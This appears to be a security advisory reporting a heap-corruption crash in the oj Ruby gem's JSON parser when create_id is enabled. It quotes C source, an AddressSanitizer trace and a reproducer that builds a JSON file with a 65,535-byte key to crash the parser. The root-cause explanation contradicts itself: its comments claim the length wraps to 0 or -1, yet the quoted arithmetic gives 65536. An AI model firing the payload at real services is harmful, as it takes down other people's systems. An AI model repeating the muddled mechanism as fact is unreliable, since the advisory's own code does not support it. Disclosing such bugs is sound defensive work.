Summary "Oj::Parser#parse" in usual mode with "create_id" enabled is vulnerable to heap corruption via a negative-size "memcpy". When a JSON object key is exactly 65,535 bytes long, an integer truncation in "form_attr" ("usual.c:63") converts the length to "-1" before passing it to "memcpy". This causes "memcpy" to copy "SIZE_MAX" bytes (interpreted as a huge "size_t"), corrupting heap memory and crashing the process. Version - Software: oj gem - Affected: all versions with "ext/oj/usual.c" - Latest tested: 3.17.1 (confirmed present) Details "ext/oj/usual.c", "form_attr": // usual.c:55–64 static ID form_attr(const char *str, size_t slen) { char buf[4096]; // ... int blen = (int)slen + 1; // ← truncates: 65535 + 1 = 65536 → wraps to 0 // or: 65535 cast to int = 65535 (fits), // but blen = 65536 → INT overflow on +1 if slen=INT_MAX // ... memcpy(buf, "@", 1); memcpy(buf + 1, str, (size_t)blen); // ← size_t(-1) = SIZE_MAX } The cache ("cache_intern") uses a fixed 65,536-byte slab. When "slen = 65535", the arithmetic wraps and "memcpy" is called with "(size_t)-1". ASAN report: ==80452==ERROR: AddressSanitizer: negative-size-param: (size=-1) #0 memcpy #1 form_attr /ext/oj/usual.c:63 #2 cache_intern /ext/oj/cache.c:326 #3 get_attr_id /ext/oj/usual.c:186 #4 close_object_create /ext/oj/usual.c:374 #5 parse /ext/oj/parser.c:693 #6 parser_parse /ext/oj/parser.c:1408 0x531000528800 is located 0 bytes inside of 65536-byte region [0x531000528800, 0x531000538800) Reproduce Generate the payload: key = 'A' * 65535 with open('poc.json', 'w') as f: f.write('{"json_class":"Oj::Bag","' + key + '":1}') Trigger: require 'oj' Oj::Parser.new(:usual, create_id: 'json_class').parse(STDIN.read)